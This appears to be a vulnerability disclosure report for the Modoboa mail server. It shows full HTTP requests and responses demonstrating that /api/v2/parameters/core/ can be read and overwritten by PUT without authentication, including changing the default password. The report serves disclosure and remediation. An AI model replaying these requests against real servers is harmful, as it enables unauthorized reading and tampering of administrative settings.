Description

During testing, it was observed that sending a GET request to the following endpoint: /api/v2/parameters/core/ returns sensitive information without any authentication or authorization.

Request

GET /api/v2/parameters/core/ HTTP/1.1
Host: demo.modoboa.org
User-Agent: 7h3h4ckv157
Accept: application/json, text/plain, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 0
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Sat, 25 Feb 2023 03:26:58 GMT
Content-Type: application/json
Content-Length: 1709
Connection: close
Vary: Accept, Accept-Language, Cookie
Allow: GET, PUT, HEAD, OPTIONS
X-Frame-Options: SAMEORIGIN
Content-Language: en

{"label":"General","params":{"authentication_type":"local","password_scheme":"sha512crypt","rounds_number":70000,"update_scheme":true,"default_password":"Pwned-by-7h3h4ckv157","random_password_length":8,"update_password_url":"","password_recovery_msg":"","sms_password_recovery":false,"sms_provider":null,"ldap_server_address":"localhost","ldap_server_port":389,"ldap_enable_secondary_server":false,"ldap_secondary_server_address":"localhost","ldap_secondary_server_port":389,"ldap_secured":"none","ldap_is_active_directory":false,"ldap_admin_groups":"","ldap_group_type":"posixgroup","ldap_groups_search_base":"","ldap_password_attribute":"userPassword","ldap_auth_method":"searchbind","ldap_bind_dn":"","ldap_bind_password":"","ldap_search_base":"","ldap_search_filter":"(mail=%(user)s)","ldap_user_dn_template":"","ldap_sync_bind_dn":"","ldap_sync_bind_password":"","ldap_enable_sync":false,"ldap_sync_delete_remote_account":false,"ldap_sync_account_dn_template":"","ldap_enable_import":false,"ldap_import_search_base":"","ldap_import_search_filter":"(cn=*)","ldap_import_username_attr":"cn","ldap_dovecot_sync":false,"ldap_dovecot_conf_file":"/etc/dovecot/dovecot-modoboa.conf","rss_feed_url":null,"hide_features_widget":false,"sender_address":"[email protected]","enable_api_communication":true,"check_new_versions":true,"send_new_versions_email":false,"new_versions_email_rcpt":"[email protected]","send_statistics":true,"inactive_account_threshold":30,"top_notifications_check_interval":30,"log_maximum_age":365,"items_per_page":30,"default_top_redirection":"user","sms_ovh_endpoint":"ovh-eu","sms_ovh_application_key":null,"sms_ovh_application_secret":null,"sms_ovh_consumer_key":null}}

The response contained sensitive information which could be used by an attacker to gain unauthorized access to the system.
This issue poses a significant risk to the confidentiality and integrity of the system and its users, because the information returns from the request can be modified using another PUT request.

Request

PUT /api/v2/parameters/core/ HTTP/1.1
Host: demo.modoboa.org
User-Agent: 7h3h4ckv157
Accept: application/json, text/plain, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 1680
Connection: close

{"authentication_type":"local","password_scheme":"sha512crypt","rounds_number":70000,"update_scheme":true,"default_password":"Pwned-by-7h3h4ckv157","random_password_length":8,"update_password_url":"","password_recovery_msg":"","sms_password_recovery":false,"sms_provider":null,"ldap_server_address":"localhost","ldap_server_port":389,"ldap_enable_secondary_server":false,"ldap_secondary_server_address":"localhost","ldap_secondary_server_port":389,"ldap_secured":"none","ldap_is_active_directory":false,"ldap_admin_groups":"","ldap_group_type":"posixgroup","ldap_groups_search_base":"","ldap_password_attribute":"userPassword","ldap_auth_method":"searchbind","ldap_bind_dn":"","ldap_bind_password":"","ldap_search_base":"","ldap_search_filter":"(mail=%(user)s)","ldap_user_dn_template":"","ldap_sync_bind_dn":"","ldap_sync_bind_password":"","ldap_enable_sync":false,"ldap_sync_delete_remote_account":false,"ldap_sync_account_dn_template":"","ldap_enable_import":false,"ldap_import_search_base":"","ldap_import_search_filter":"(cn=*)","ldap_import_username_attr":"cn","ldap_dovecot_sync":false,"ldap_dovecot_conf_file":"/etc/dovecot/dovecot-modoboa.conf","rss_feed_url":null,"hide_features_widget":false,"sender_address":"[email protected]","enable_api_communication":true,"check_new_versions":true,"send_new_versions_email":false,"new_versions_email_rcpt":"[email protected]","send_statistics":true,"inactive_account_threshold":30,"top_notifications_check_interval":30,"log_maximum_age":365,"items_per_page":30,"default_top_redirection":"user","sms_ovh_endpoint":"ovh-eu","sms_ovh_application_key":null,"sms_ovh_application_secret":null,"sms_ovh_consumer_key":null}

Response

HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Sat, 25 Feb 2023 03:24:46 GMT
Content-Length: 0
Connection: close
Vary: Accept, Accept-Language, Cookie
Allow: GET, PUT, HEAD, OPTIONS
X-Frame-Options: SAMEORIGIN
Content-Language: en

Proof of Concept